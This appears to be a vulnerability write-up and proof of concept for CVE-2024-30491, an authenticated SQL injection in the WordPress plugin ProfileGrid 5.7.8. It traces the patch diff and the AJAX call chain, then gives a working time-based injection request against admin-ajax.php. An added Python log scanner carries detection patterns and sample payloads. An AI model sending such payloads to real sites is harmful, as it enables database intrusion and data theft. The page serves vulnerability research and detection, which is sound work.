
POC details: 58ccf2cb3b2a2d23118c4bfe848c73e7b9d1edfc

Related vulnerability
Title: WordPress Plugin ProfileGrid SQL injection vulnerability (CVE-2024-30491)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets a personal blog be hosted on a server running PHP and MySQL. A WordPress plugin is an add-on application for the platform. The WordPress plugin ProfileGrid contains a SQL injection vulnerability.
Introduction
# CVE-2024-30491-Poc
## ProfileGrid <= 5.7.8 - Authenticated (Subscriber+) SQL Injection

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profilegrid-user-profiles-groups-and-communities/profilegrid-578-authenticated-subscriber-sql-injection

Build WordPress: `docker-compose -f stack.yml up`

Step 1: Diff ProfileGrid 5.7.8 against ProfileGrid 5.7.9
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/644fb3c9-df32-40e6-910f-24ce69218595)
File: includes\class-profile-magic-dbhandler.php: in function get_all_result, the handling of the variable $additional changed.
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/6d372af1-1558-439b-9263-df5052cf63f3)
Look at the function pm_filter_addtional_query_parameter in includes\class-profile-magic-dbhandler.php (ProfileGrid 5.7.9): it appears to check the value for keywords that could be used for SQL injection.
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/4a6e697e-b617-4744-991d-658d68ca740f)

Step 2: Focus on plugin ProfileGrid 5.7.8. I searched for functions that call the function get_all_result.
I found that the function pm_messenger_search_threads in file includes\class-profile-magic-chat-system.php calls the function get_all_result.
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/c6ab397e-d4e9-4551-aabb-4fa7816550c3)

Step 3: I searched for functions that call the function pm_messenger_search_threads.

File: public\class-profile-magic-public.php: the function pg_search_threads calls the function pm_messenger_search_threads.
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/87e303d7-095b-42ce-949f-f59613159a98)

Step 4:
File: includes\class-profile-magic.php
I found the registration of an action hook named `wp_ajax_pg_search_threads`. When this hook runs, the `pg_search_threads` function is called to process the request and return the results.
![image](https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/990ee72d-c168-46c6-b350-932152419b96)

Exploit:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Cookie: {{Cookie}}
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

action=pg_search_threads&search='+and+sleep(if(1=1,5,0))--+-

```


https://github.com/truonghuuphuc/CVE-2024-30491-Poc/assets/20487674/591033b5-94cd-4bf2-966e-b28c2bd592f5
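As an added defender-side example (this is not code from the PoC repository or from the ProfileGrid project), the following Python scans request-log records for the request shape shown above: admin-ajax.php calls whose `action` is `pg_search_threads` and whose `search` parameter carries a quote followed by a SQL operator, a comment terminator, or a timing function such as `sleep(`. The JSON-lines log format with a captured body is an assumption (most web-server access logs do not record POST bodies, so in practice this would run over WAF or reverse-proxy logs configured to capture them), and all sample records are constructed. The rule generalizes slightly beyond the page's payload by also covering the same parameters sent in a GET query string and other timing functions.

```python
"""Flag admin-ajax.php requests whose ProfileGrid `search` parameter looks like SQL injection.

Added example for this page; not part of the PoC repository or the plugin.
Assumed log format: one JSON object per line with method, path and (for POSTs)
the raw form body, as a WAF or reverse proxy that logs bodies might emit.
"""
import json
import re
from urllib.parse import parse_qs, urlparse

ACTION = "pg_search_threads"   # AJAX action from the page's call chain
VULN_PARAM = "search"          # parameter that reaches get_all_result

# Constructed sample records (not from any real system). Record 2 carries the
# page's time-based payload (URL-encoded); record 4 sends a similar payload by
# GET; record 5 is a legitimate search term containing an apostrophe.
SAMPLE_LOG = """\
{"ts":"2024-05-01T10:00:01Z","src":"198.51.100.7","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=pg_search_threads&search=hello"}
{"ts":"2024-05-01T10:00:05Z","src":"198.51.100.7","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=pg_search_threads&search=%27+and+sleep%28if%281%3D1%2C5%2C0%29%29--+-"}
{"ts":"2024-05-01T10:00:09Z","src":"203.0.113.4","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=heartbeat&_nonce=abc"}
{"ts":"2024-05-01T10:00:12Z","src":"203.0.113.4","method":"GET","path":"/wp-admin/admin-ajax.php?action=pg_search_threads&search=%27%20or%20benchmark(1000000,md5(1))--","body":""}
{"ts":"2024-05-01T10:00:15Z","src":"192.0.2.9","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=pg_search_threads&search=O%27Brien"}
"""

# A lone apostrophe is legitimate in a search term (O'Brien). A quote followed by
# a boolean/set operator, a quote followed by a comment terminator, or a timing
# function call is not something a user types into a thread search box.
INDICATORS = [
    ("time_based_function", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)),
    ("quote_then_operator", re.compile(r"['\"]\s*(and|or|union|select)\b", re.I)),
    ("comment_terminator", re.compile(r"['\"].*(--|/\*)")),
]


def extract_params(entry):
    """Return (path, params) with query-string and POST-body parameters merged and URL-decoded."""
    parsed = urlparse(entry.get("path", ""))
    params = parse_qs(parsed.query, keep_blank_values=True)
    if entry.get("method", "").upper() == "POST" and entry.get("body"):
        for key, values in parse_qs(entry["body"], keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return parsed.path, params


def classify_request(entry):
    """Return the sorted list of indicator names hit by one record (empty if it is not suspicious)."""
    path, params = extract_params(entry)
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return []
    if ACTION not in params.get("action", []):
        return []
    hits = set()
    for value in params.get(VULN_PARAM, []):
        for name, pattern in INDICATORS:
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


def scan_log(text):
    """Return [(record, indicators)] for every record that triggers at least one indicator."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip rather than abort the whole scan
        hits = classify_request(entry)
        if hits:
            alerts.append((entry, hits))
    return alerts


if __name__ == "__main__":
    for record, hits in scan_log(SAMPLE_LOG):
        print(f"{record['ts']} {record['src']} {record['method']} action={ACTION}: {', '.join(hits)}")
```

On the constructed sample the scanner reports records 2 and 4 and stays quiet on the plain search, the unrelated `heartbeat` action, and the apostrophe in `O'Brien`. Because `parse_qs` decodes `+` and percent-escapes before matching, the rule sees the same string the plugin would have concatenated into its query.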


File snapshot

```
[4.0K] /data/pocs/58ccf2cb3b2a2d23118c4bfe848c73e7b9d1edfc
├── [ 12M] profilegrid-user-profiles-groups-and-communities.5.7.8.zip
├── [ 12M] profilegrid-user-profiles-groups-and-communities.5.7.9.zip
├── [2.5K] README.md
└── [ 607] stack.yml

0 directories, 4 files
```